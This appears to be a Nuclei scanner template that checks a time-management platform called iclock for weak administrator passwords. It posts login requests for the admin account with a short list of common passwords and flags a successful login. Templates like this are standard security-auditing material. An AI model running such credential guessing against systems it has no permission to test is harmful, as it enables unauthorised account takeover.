id: iclock-weaklogin

info:
  name: 时间精细化管理平台弱口令
  author: SleepingBag945
  severity: high



http:
  - raw:
      - |
        POST /iclock/accounts/login/ HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

        username=admin&password={{password}}

    payloads:
      password:
        - admin
        - 123456
        - 111111
        - 12345678
        - 123
        - admin123
        - admin123456
        - admin@123
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"message","ret","0") && contains_all(to_lower(all_headers),'set-cookie')